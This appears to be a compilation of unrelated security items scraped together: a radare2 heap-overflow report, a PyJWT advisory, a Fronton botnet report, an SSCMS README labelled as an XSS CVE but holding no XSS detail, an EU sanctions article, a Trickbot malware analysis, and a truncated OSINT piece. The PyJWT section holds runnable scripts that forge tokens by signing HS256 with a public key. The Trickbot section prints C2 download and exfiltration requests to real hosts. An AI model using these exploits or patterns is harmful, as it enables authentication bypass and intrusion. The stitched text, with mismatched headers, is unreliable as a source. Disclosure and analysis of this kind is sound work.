radareorg radare2 5.5.2 is vulnerable to Buffer Overflow via /libr/core/anal_objc.c mach-o parser.

**Heap Buffer overflows in objc\_build\_refs**

I have discovered two heap buffer  
overflows while parsing mach-o executables.  
Please refer bellow for further information.

**Environment**

shad3@ubuntu:~/Desktop/$ uname -ms
Linux x86\_64

shad3@ubuntu:~/Desktop/$ r2 -v
radare2 5.5.2 27243 @ linux-x86-64 git.5.5.0
commit: 79effabdf5db431e40ea2aafc7f322ca32edb876 build: 2021-12-07\_\_12:18:24

shad3@ubuntu:~/Desktop/$ date
Tue Dec  7 14:07:20 PST 2021

**ASAN**

Stack Trace from an ASAN build while triggering the firs bug

    =================================================================
    ==91945==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250004cb6a8 at pc 0x7f29c4016d1a bp 0x7ffe0c8bf8b0 sp 0x7ffe0c8bf058
    WRITE of size 9896288 at 0x6250004cb6a8 thread T0
        #0 0x7f29c4016d19  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5ed19)
        #1 0x7f29c08c3157 in r_io_vread_at /home/shad3/Desktop/radare2/libr/io/io.c:203
        #2 0x7f29c08c33ec in internal_r_io_read_at /home/shad3/Desktop/radare2/libr/io/io.c:226
        #3 0x7f29c08c36b6 in r_io_read_at /home/shad3/Desktop/radare2/libr/io/io.c:264
        #4 0x7f29b99bf27b in objc_build_refs /home/shad3/Desktop/radare2/libr/core/anal_objc.c:150
        #5 0x7f29b99c0143 in objc_find_refs /home/shad3/Desktop/radare2/libr/core/anal_objc.c:231
        #6 0x7f29b99c14b5 in cmd_anal_objc /home/shad3/Desktop/radare2/libr/core/anal_objc.c:329
        #7 0x7f29b95fa8f0 in cmd_anal_all /home/shad3/Desktop/radare2/libr/core/cmd_anal.c:10595
        #8 0x7f29b9603d85 in cmd_anal /home/shad3/Desktop/radare2/libr/core/cmd_anal.c:11639
        #9 0x7f29b9828c92 in r_cmd_call /home/shad3/Desktop/radare2/libr/core/cmd_api.c:537
        #10 0x7f29b96fbea3 in r_core_cmd_subst_i /home/shad3/Desktop/radare2/libr/core/cmd.c:4392
        #11 0x7f29b96ef27b in r_core_cmd_subst /home/shad3/Desktop/radare2/libr/core/cmd.c:3279
        #12 0x7f29b9705da6 in run_cmd_depth /home/shad3/Desktop/radare2/libr/core/cmd.c:5279
        #13 0x7f29b9706add in r_core_cmd /home/shad3/Desktop/radare2/libr/core/cmd.c:5362
        #14 0x7f29b9707883 in r_core_cmd0 /home/shad3/Desktop/radare2/libr/core/cmd.c:5519
        #15 0x7f29c3151748 in r_main_radare2 /home/shad3/Desktop/radare2/libr/main/radare2.c:1390
        #16 0x560128934b4e in main /home/shad3/Desktop/radare2/binr/radare2/radare2.c:96
        #17 0x7f29c1fc8bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #18 0x560128934579 in _start (/home/shad3/Desktop/radare2/binr/radare2/radare2+0x1579)
    
    0x6250004cb6a8 is located 0 bytes to the right of 9640-byte region [0x6250004c9100,0x6250004cb6a8)
    allocated by thread T0 here:
        #0 0x7f29c4096d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
        #1 0x7f29b99bf0a6 in objc_build_refs /home/shad3/Desktop/radare2/libr/core/anal_objc.c:145
        #2 0x7f29b99c0143 in objc_find_refs /home/shad3/Desktop/radare2/libr/core/anal_objc.c:231
        #3 0x7f29b99c14b5 in cmd_anal_objc /home/shad3/Desktop/radare2/libr/core/anal_objc.c:329
        #4 0x7f29b95fa8f0 in cmd_anal_all /home/shad3/Desktop/radare2/libr/core/cmd_anal.c:10595
        #5 0x7f29b9603d85 in cmd_anal /home/shad3/Desktop/radare2/libr/core/cmd_anal.c:11639
        #6 0x7f29b9828c92 in r_cmd_call /home/shad3/Desktop/radare2/libr/core/cmd_api.c:537
        #7 0x7f29b96fbea3 in r_core_cmd_subst_i /home/shad3/Desktop/radare2/libr/core/cmd.c:4392
        #8 0x7f29b96ef27b in r_core_cmd_subst /home/shad3/Desktop/radare2/libr/core/cmd.c:3279
        #9 0x7f29b9705da6 in run_cmd_depth /home/shad3/Desktop/radare2/libr/core/cmd.c:5279
        #10 0x7f29b9706add in r_core_cmd /home/shad3/Desktop/radare2/libr/core/cmd.c:5362
        #11 0x7f29b9707883 in r_core_cmd0 /home/shad3/Desktop/radare2/libr/core/cmd.c:5519
        #12 0x7f29c3151748 in r_main_radare2 /home/shad3/Desktop/radare2/libr/main/radare2.c:1390
        #13 0x560128934b4e in main /home/shad3/Desktop/radare2/binr/radare2/radare2.c:96
        #14 0x7f29c1fc8bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5ed19) 
    Shadow bytes around the buggy address:
      0x0c4a80091680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a80091690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a800916a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a800916b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a800916c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c4a800916d0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
      0x0c4a800916e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a800916f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a80091700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a80091710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a80091720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==91945==ABORTING
    

**Explanation of the vulnerabilities**

The vulnerability lies in the objc_build_refs function that  
is responsible of building the references of a mach-o file as its name  
suggests.

The function can be found out at:

    /radare2/libr/core/anal_objc.c
    

Please consider the following code  
bellow which has been simplified for readability:

static bool objc\_build\_refs(RCoreObjc \*objc) {
	...

	size\_t ss\_selrefs = objc->\_selrefs\->vsize;

	size\_t maxsize = R\_MAX (ss\_const, ss\_selrefs); // 1a
	maxsize = R\_MIN (maxsize, objc->file\_size);    // 1b

	ut8 \*buf = calloc (1, maxsize);				   // 2
	if (!buf) {
		return false;
	}

	...
	if (!r\_io\_read\_at (objc->core\->io, va\_selrefs, buf, ss\_selrefs)) { // 3
		eprintf ("aao: Cannot read the whole selrefs section\\n");
		return false;
	}
	...
	free (buf);
	return true;
}

At points 1a and 1b theres an attempt to sanitize the ss_selrefs  
variable as it has to be done. Based on the return value of the two macros  
which is stored in the maxsize variable\* an internal buffer of the function  
is allocated, here called buf. At point 3 there's a read operation perfomed  
to the buffer based on the **unsanitized** ss_selfrefs variable instead of the  
maxsize one. In case where the ss_selrefs is greater than the maxsize  
variable this read operation results in a heap buffer overflow.

The same vulnerability exists on the other read operation performed in the same function.  
Which also results in a heap buffer overflow.

	size\_t ss\_const = objc->\_const->vsize;
....
	if (!r\_io\_read\_at (objc->core->io, objc->\_const->vaddr, buf, ss\_const)) {
		eprintf ("aao: Cannot read the whole const section %zu\\n", ss\_const);
		return false;
	}
	

PS: maxsize seems like an obscure name for that variable, it might  
be better to consider changing that, unless there's a specific reason.

**Proposed fixes**

The r_io_read_at functions to be to be called with the variable  
maxsize instead of the ss_selrefs and ss_const as an argument.

**Notes**

*   Please check the attached binary that crashes  
    the radare2 binary and reproduces the first vulnerability  
    by running the following command e.g. in an ASAN build  
    r2 -qq -AA crash
    
*   I would highly appreciate if these bugs qualify for  
    CVEs to request them for me.

CVE-2021-44975: Heap buffer overflows in function objc_build_refs while parsing mach-o files. · Issue #19476 · radareorg/radare2

PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.

**Impact**

_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an  
> attacker submitting the JWT token can choose the used signing algorithm.
> 
> The PyJWT library requires that the application chooses what algorithms  
> are supported. The application can specify  
> "jwt.algorithms.get\_default\_algorithms()" to get support for all  
> algorithms. They can also specify a single one of them (which is the  
> usual use case if calling jwt.decode directly. However, if calling  
> jwt.decode in a helper function, all algorithms might be enabled.)
> 
> For example, if the user chooses "none" algorithm and the JWT checker  
> supports that, there will be no signature checking. This is a common  
> security issue with some JWT implementations.
> 
> PyJWT combats this by requiring that the if the "none" algorithm is  
> used, the key has to be empty. As the key is given by the application  
> running the checker, attacker cannot force "none" cipher to be used.
> 
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is  
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used  
> if the key begins with "ssh-rsa". If HMAC is used with a public key, the  
> attacker can just use the publicly known public key to sign the token  
> and the checker would use the same key to verify.
> 
> From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm.  
> With ed25519, PyJWT supports public keys that start with "ssh-", for  
> example "ssh-ed25519".

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

\# Generate ed25519 private key
private\_key \= ed25519.Ed25519PrivateKey.generate()

\# Get private key bytes as they would be stored in a file
priv\_key\_bytes \= 
private\_key.private\_bytes(encoding\=serialization.Encoding.PEM,format\=serialization.PrivateFormat.PKCS8, 
encryption\_algorithm\=serialization.NoEncryption())

\# Get public key bytes as they would be stored in a file
pub\_key\_bytes \= 
private\_key.public\_key().public\_bytes(encoding\=serialization.Encoding.OpenSSH,format\=serialization.PublicFormat.OpenSSH)

\# Making a good jwt token that should work by signing it with the 
private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="EdDSA")

\# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, pub\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
     print("POC Successfull")

\# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work
\# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#
#        invalid\_strings = \[
#            b"-----BEGIN PUBLIC KEY-----",
#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",
#            b"ssh-rsa",
#        \]
#
\# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:
#
#                if "-----BEGIN PUBLIC" in str\_key:
#                    return load\_pem\_public\_key(key)
#                if "-----BEGIN PRIVATE" in str\_key:
#                    return load\_pem\_private\_key(key, password=None)
#                if str\_key\[0:4\] == "ssh-":
#                    return load\_ssh\_public\_key(key)
#
\# These should most likely made to match each other to prevent this behavior

import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv\_key\_bytes \= b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END EC PRIVATE KEY-----"""

pub\_key\_bytes \= b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END PUBLIC KEY-----"""

ssh\_key\_bytes \= b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

\# Making a good jwt token that should work by signing it with the private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="ES256")

\# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, ssh\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
    print("POC Successfull")
else:
    print("POC Failed")

> The issue is not that big as  
> algorithms=jwt.algorithms.get\_default\_algorithms() has to be used.  
> However, with quick googling, this seems to be used in some cases at  
> least in some minor projects.

**Patches**

Users should upgrade to v2.4.0.

**Workarounds**

Always be explicit with the algorithms that are accepted and expected when decoding.

**References**

_Are there any links users can visit to find out more?_

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/jpadilla/pyjwt
*   Email José Padilla: pyjwt at jpadilla dot com

CVE-2022-29217

Fronton botnet has far more ability than launching DDOS attack, can track social media trends and launch suitable propaganda.

Fronton botnet has far more ability than launching DDOS attack, can track social media trends and launch suitable propaganda.

A fresh look at the Fronton DDoS-focused botnet reveals the criminal tool has more capabilities than previously known.

The Fronton botnet first made the headline in March 2020. That is when, according to news reports, a hacktivist group called Digital Revolution said it obtained documents claiming to be from 0day Technologies, allegedly a contractor for Russia’s Federal Security Service.

Now the cybersecurity firm Nisos is reporting the Fronton malware goes beyond delivering DDoS attacks and can be used to create massive numbers of social media accounts that can then be used to shape opinion via social media manipulation.

After further analysis of the documents related to Fronton, the Nisos researcher assert that DDoS “is only one of the many capabilities of the system… Nisos analyzed the data and determined that Fronton is a system developed for coordinated inauthentic behavior on a massive scale,” Nisos added.

****Working of Fronton****

Fronton, researchers say, doubles as a backend infrastructure for the social media disinformation. The malware uses an army of compromised IOT devices to carry out both DDoS attacks and disinformation campaigns.

“This system includes a web-based dashboard known as SANA that enables a user to formulate and deploy trending social media events en masse. The system creates these events that it refers to as Инфоповоды, ‘newsbreaks,’ utilizing the botnet as a geographically distributed transport,” according to researchers.

SANA allows users to create fake social media accounts with generated email and phone numbers, these fake accounts are used to spread content across social networks, blogs and forums, researchers said.

“SANA creates social media persona accounts, including provisioning of an email and phone number,” Nisos explained.

Additionally, researchers note that the platform allows users to control the number of likes, comments, and reactions. As well as provide the “facilities for creating these newsbreaks on a schedule or a reactive basis”, this will track the messages, trends, and their responses.

A response model is specified to perform certain actions after the execution of the Newsbreak. The response model allows the group of bots to react to a piece of particular news in a certain fashion (positive, negative, or neutral), according to the report.

“The response model allows an operator to specify weekly frequency of likes, comments, and reposts. It also allows for the selection of comments from the dictionary lists in order to direct the response patterns of the virtual social group,” Nisos added in a report.

The operators can also specify a minimum frequency of actions and a minimum interval between actions. The researcher also found the platform has “a machine learning (ML) system involved that can be turned on or off based on behavior observed on social media.”

The researcher added that Fronton operators have the capability to control the number of friends a fake bot should maintain, and integrate with a feature to store imagery for the bot.

The usage of the tool in real-world attacks is not clear, and as of April 2022, the web portal is active and moved to a different domain.

“As of April 2022, 0day technologies has changed its domain from 0day\[.\]ru to 0day\[.\]llc,” Nisos noted.

Nisos released a complete research report for further analysis.

Fronton IOT Botnet Packs Disinformation Punch

SiteServer CMS V6.15.51 is affected by a Cross Site Scripting (XSS) vulnerability.

**SSCMS**

SSCMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

**版本**

项目发布的正式版本存放在 master 分支，最新版本存放在 staging 分支

编译状态

版本号

发布日期

**开发文档**

《SSCMS 使用指南》

《SSCMS 系统更新》

《SSCMS STL 语言》

《SSCMS 插件开发》

《SSCMS 官方插件》

《SSCMS 命令行》

《SSCMS REST API》

《SSCMS 数据结构》

**SSCMS 源码结构**

    │ sscms.sln                  Visual Studio 项目文件
    │
    ├─docker                      Docker 配置文件
    ├─src/Datory                  数据库基础类
    ├─src/SSCMS                   接口、基础类
    ├─src/SSCMS.Cli               命令行工具
    ├─src/SSCMS.Core              CMS核心代码
    ├─src/SSCMS.Web               CMS App
    └─tests                       测试
    

**发布跨平台版本****Window(64 位)：**

    npm install
    npm run build-win-x64
    dotnet build ./build-win-x64/build.sln -c Release
    dotnet publish ./build-win-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    dotnet publish ./build-win-x64/src/SSCMS.Web/SSCMS.Web.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    npm run copy-win-x64
    

> Note: 进入文件夹 ./publish/sscms-win-x64 获取最终发布版本

**Window(32 位)：**

    npm install
    npm run build-win-x32
    dotnet build ./build-win-x32/build.sln -c Release
    dotnet publish ./build-win-x32/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    dotnet publish ./build-win-x32/src/SSCMS.Web/SSCMS.Web.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    npm run copy-win-x32
    

> Note: 进入文件夹 ./publish/sscms-win-x32 获取最终发布版本

**Linux：**

    npm install
    npm run build-linux-x64
    dotnet build ./build-linux-x64/build.sln -c Release
    dotnet publish ./build-linux-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    dotnet publish ./build-linux-x64/src/SSCMS.Web/SSCMS.Web.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    npm run copy-linux-x64
    

> Note: 进入文件夹 ./publish/sscms-linux-x64 获取最终发布版本

**MacOS：**

    npm install
    npm run build-osx-x64
    dotnet build ./build-osx-x64/build.sln -c Release
    dotnet publish ./build-osx-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    dotnet publish ./build-osx-x64/src/SSCMS.Web/SSCMS.Web.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    npm run copy-osx-x64
    

> Note: 进入文件夹 ./publish/sscms-osx-x64 获取最终发布版本

**在 Docker 中运行**

拉取最新版本的 SS CMS 镜像

docker pull sscms/core:latest

运行 SS CMS 容器

docker run -d \\
    --name my-sscms \\
    -p 80:80 \\
    --restart=always \\
    -v volume-sscms:/app/wwwroot \\
    -e SSCMS\_SECURITY\_KEY=e2a3d303-ac9b-41ff-9154-930710af0845 \\
    -e SSCMS\_DATABASE\_TYPE=SQLite \\
    sscms/core

**贡献代码**

项目编译需要使用 Visual Studio 2019，你可以从这里下载 Visual Studio Community 2019

代码贡献有很多形式，从提交问题，撰写文档，到提交代码，我们欢迎任何形式的贡献！

**系统更新**

SSCMS 产品将每隔两月发布新的正式版本，我们将在每次迭代中对核心功能、文档支持、功能插件以及网站模板四个方面进行持续改进。

**问题与建议**

如果发现任何 BUG 以及对产品使用的问题与建议，请提交至 Github Issues 或者 Gitee Issues。

**关注最新动态**

**License**

GNU Affero General Public License v3.0

Copyright (C) 2003-2022 SSCMS

CVE-2021-42656: GitHub - siteserver/cms: SS CMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

Strategy includes travel bans and asset freezing

Strategy includes travel bans and asset freezing

  

The European Council is to extend certain sanctions for three more years, with the aim of deterring cyber-attacks.

The council says that the move will improve the EU’s ability to “prevent, discourage, deter, and respond to” malicious cyber activity. This extension is a departure from previous policy, which required annual renewals.

The sanctions regime currently applies to four “entities” and eight individuals with measures including travel bans and asset freezing. The framework was set up in 2019 and forms part of the EU’s “cyber diplomacy toolbox”.

In 2020, the EU sanctioned two individuals and an entity for their part in a 2015 cyber-attack against Germany’s parliament, the Bundestag.

Read more of the latest web security news from across Europe

Security bodies have so far welcomed the sanction move.

“The commitment to a sanctions regime shows that the EU continues to recognize the combined importance of cybersecurity and enabling technologies within the bloc,” Jon France, CISO at (ISC)2 told The Daily Swig.

“In the face of the continued conflict in Ukraine, which involves a cybersecurity/cyber-attack element, it is unsurprising that the bloc wishes to retain sensible sanctions and measures, not only to deter escalation towards the EU and its member countries but also to encourage others to continue to protect their own cyber assets.”

However, observers’ views on the effectiveness of sanctions against cybercriminals are mixed. Identifying attackers to the standards required by criminal law remains difficult.

READ MORE EU targets standardization as key to bloc-wide cyber-resilience

A 2021 report by the Stiftung Wissenschaft und Politik, the German Institute for International and Security Affairs, found that attribution is time consuming; relies on intelligence, including from NATO partners; and is make more difficult by the varying technical and intelligence capabilities across member states.

According to security expert, Mike Jones, aka the ‘h4unt3d hacker’, relatively few governments apply sanctions against cybercriminals – these include the US and UN as well as the EU. Even where countries do have a sanctions regime, the process for identifying targets is often kept secret, he says.

“The various intelligence agencies do a lot of this work in secret hidden from the public until the operation is complete,” Jones told The Daily Swig.

And sanctions themselves might only have a limited impact.

“Sanctioning an actor’s finances and ability to travel can make things difficult, however, criminals do not follow the law and will find other means,” he notes. This includes using cryptocurrencies.

“It may hinder movement or financial operations for a short period but they will assume new identities, find other ways to carry out transactions, and recruit new individuals that are not on the sanctioning radar to carry out their operations.”

Jones suggests that as well as sanctions, governments need to take a more active approach.

“By destroying network infrastructure, infiltrating their communications, and planting moles in the various groups this will cause distrust among the actors and eliminate the operations and force the groups to recollect and build new infrastructure,” he said.

DON’T MISS US revises policy regarding Computer Fraud and Abuse Act, will not prosecute good faith research

European Council extends sanction regime to deter future cyber-attacks

In this day and age, we are not dealing with roughly pieced together, homebrew type of viruses anymore. Malware is an industry, and professional developers are found to exchange, be it by stealing one's code or deliberate collaboration. Attacks are multi-layer these days, with diverse sophisticated software apps taking over different jobs along the attack-chain from initial compromise to

In this day and age, we are not dealing with roughly pieced together, homebrew type of viruses anymore. Malware is an industry, and professional developers are found to exchange, be it by stealing one's code or deliberate collaboration. Attacks are multi-layer these days, with diverse sophisticated software apps taking over different jobs along the attack-chain from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has largely increased both the availability and the potential effectiveness and impact of malware. Sound scary?

Well, it does, but the apparent professionalization actually does have some good sides too. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. Ultimately this means that, with enough experience, skilled analysts can detect and stop malware in its tracks, often with minimal or no damage (if the attackers make it through the first defense lines at all).

Let's see this mechanic in action as we follow an actual CyberSOC analyst investigating the case of the malware dubbed "Trickbot."

****Origins of Trickbot****

Orange Cyberdefense's CyberSOCs have been tracking the specific malware named Trickbot for quite some time. It is commonly attributed to a specific Threat Actor generally known under the name of Wizard Spider (Crowdstrike), UNC1778 (FireEye) or Gold Blackburn (Secureworks).

Trickbot is a popular and modular Trojan initially used in targeting the banking industry, that has meanwhile been used to compromise companies from other industries as well. It delivers several types of payloads. Trickbot evolved progressively to be used as Malware-as-a-Service (MaaS) by different attack groups.

The threat actor behind it is known to act quickly, using the well-known post-exploitation tool Cobalt Strike to move laterally on the company network infrastructure and deploy ransomware like Ryuk or Conti as a final stage. As it is used for initial access, being able to detect this threat as quickly as possible is a key element of success for preventing further attacks.

This threat analysis will be focused on the threat actor named TA551, and its use of Trickbot as an example. I will present how we are able to perform detection at the different steps of the kill chain, starting from the initial infection through malspam campaigns, moving on to the detection of tools used by the threat actor during compromise. We will also provide some additional information about how the threat actor is using this malware and the evolution it took.

****1** — **Initial access****

Since June 2021, the group TA551 started delivering the Trickbot malware using an encrypted zip. The email pretext mimics an important information to reduce the vigilance of the user.

The attachment includes a .zip file which again includes a document. The zip file always uses the same name as "request.zip" or "info.zip", and the same name for the document file.

_NB: The Threat Actor used the same modus operandi before/in parallel to Trickbot to deliver other malware. We observed during the same period, from June 2021 to September 2021, the use of Bazarloader on the initial access payload._

****2** — **Execution****

When the user opens the document with macros enabled, an HTA file will be dropped on the system and launched using cmd.exe. The HTA file is used to download the Trickbot DLL from a remote server.

This behavior is related to TA551, we can identify it with the pattern "/bdfh/" in the GET request.

> _GET /bdfh/M8v\[..\]VUb HTTP/1.1_
> 
> _Accept: \*/\*_
> 
> _Host: wilkinstransportss.com_
> 
> _Content-Type: application/octet-stream_

NB: Patterns related to TA551 evolved with time, since mid-August 2021, the pattern changed to "/bmdff/". The DLL is registered as a jpg file to hide the real extension, and it tries to be run via regsvr32.exe. Then, Trickbot will be injected into "wermgr.exe" using Process Hollowing techniques.

Figure 1 - Trickbot execution in the sandbox

****3** — **Collection****

After the successful initial system compromise, Trickbot can collect a lot of information about its target using legitimate Windows executables and identify if the system is member of an Active Directory domain.

Additionally, to this collection, Trickbot will scan more information like Windows build, the public IP address, the user that is running Trickbot, and also if the system is behind an NAT firewall.

Trickbot is also able to collect sensitive information like banking data or credentials, and exfiltrate it to a dedicated command and control server (C2).

****4** — **Command & Control****

When the system is infected, it can contact several kinds of Trickbot C2. The main C2 is the one with which the victim system will communicate, mainly to get new instructions.

All requests to a Trickbot C2 use the following format:

> "/<gtag>/<Client\_ID>/<command>/<additionnal
> 
> information about the command>/"

> _GET /zev4/56dLzNyzsmBH06b\_W10010240.42DF9F315753F31B13F17F5E731B7787/0/Windows 10 x64/1108/XX.XX.XX.XX/38245433F0E3D5689F6EE84483106F4382CC92EAFAD5120_
> 
> _6571D97A519A2EF29/0bqjxzSOQUSLPRJMQSWKDHTHKEG/ HTTP/1.1_
> 
> _Connection: Keep-Alive_
> 
> _User-Agent: curl/7.74.0_
> 
> _Host: 202.165.47.106_

All data collected is sent to a separate Exfiltration Trickbot C2 using HTTP POST request methods. The request format keeps the same, but the command "90" is specific to data exfiltration, more precisely system data collected off the infected system.

> _POST /zev4/56dLzNyzsmBH06b\_W10010240.42DF9F315753F31B13F17F5E731B7787/90/ HTTP/1.1_
> 
> _Connection: Keep-Alive_
> 
> _Content-Type: multipart/form-data; boundary=------Bound_
> 
> _ary0F79C562_
> 
> _User-Agent: Ghost_
> 
> _Host: 24.242.237.172:443_

****Follow-up attacks: Cobalt Strike, Ryuk, Conti****

Cobalt Strike\[1\] is a commercial, fully-featured, remote access tool that calls itself an "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike's interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.

In our context, Trickbot uses the highjacked wermgr.exe process to load a Cobalt Strike beacon into memory.

Several ransomware operators are affiliated to the threat actors as well. The aim of Trickbot is to perform the initial access preceding the actual ransomware attack. Conti and Ryuk are the main ransomwares observed on the final stage of Trickbot infections, though by far not the only ones. Conti is a group that operates a Ransomware-as-a-Service model and is available to several affiliate threat actors. Ryuk on the other hand is a ransomware that is linked directly to the threat actor behind Trickbot.

****Key learnings****

Threat actors often still use basic techniques to get into the network like phishing emails. Raising awareness about phishing is definitely a great first step in building up cyber resilience. The best attacks are, after all, the ones that never even get started.

Of course, there is no such thing as bullet-proof preventive protection in cyber. It's all the more important to have the capability of detecting Trickbot at an early stage. Though the attack chain can be broken at every stage along the way: the later it is, the higher the risk of full compromise and the resulting damage. Trickbot is used by different threat actors, but the detection approach stays the same on most of its specific stages. Some of the indicators of compromise are explained here. But malware gets updates too.

Analysts have to stay vigilant. Tracking and watching a specific malware or a threat actor is a key to follow its evolution, improvement, and keep up to date about an efficient detection of the threat.

This is a story from the trenches found in the Security Navigator. More malware analysis and other interesting stuff including accounts of emergency response operations and a criminal scientist's view on cyber extortion, as well as tons of facts and figures on the security landscape in general can be found there as well. The full report is available for download on the Orange Cyberdefense website, so have a look. It's worth it!

_\[1\] MITRE ATT&CK Cobaltstrike : https://attack.mitre.org/software/S0154/_

_This article was written by **Florian Goutin**, CyberSOC analyst at Orange Cyberdefense._

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Malware Analysis: Trickbot

Intelligence collected from public information online could be impacting traditional warfare and altering the calculus between large and small powers.

An open source panopticon—from commercial big data aggregation to information infrastructure across mobile, smart devices, and social media—is reshaping the way intelligence is collected and used in conventional war.

Open source intelligence is information that can be readily and legally accessed by the general public. It was used in war and diplomacy long before the internet—alongside information stolen or otherwise secretly obtained and closely held. But its prevalence today means what was once cost-prohibitive to many is now affordable to myriad actors, whether North Korea, the CIA, journalists, terrorists, or cybercriminals.

